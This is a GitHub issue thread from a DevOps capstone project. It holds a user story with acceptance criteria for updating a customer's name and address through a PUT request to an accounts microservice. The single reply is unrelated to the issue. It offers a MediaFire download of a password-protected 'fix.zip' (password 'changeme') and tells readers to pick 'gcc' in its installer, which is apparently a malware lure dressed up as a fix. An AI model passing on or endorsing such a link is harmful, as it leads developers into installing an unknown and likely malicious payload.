### ISSUE TITLE
Update an account in the service

### ISSUE THREAD

**Issue by skpatil99** [skpatil99/devops-capstone-project#5]
As a user
I need to update an account's details in the accounts microservice
So that I can modify a customer's basic information if it changes

Details and Assumptions
The service should allow updating the customer's name and address.
The update should only occur if the account exists.
Acceptance Criteria
Given an existing account
When a PUT request with updated information is made
Then the service updates the customer's details in the database

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
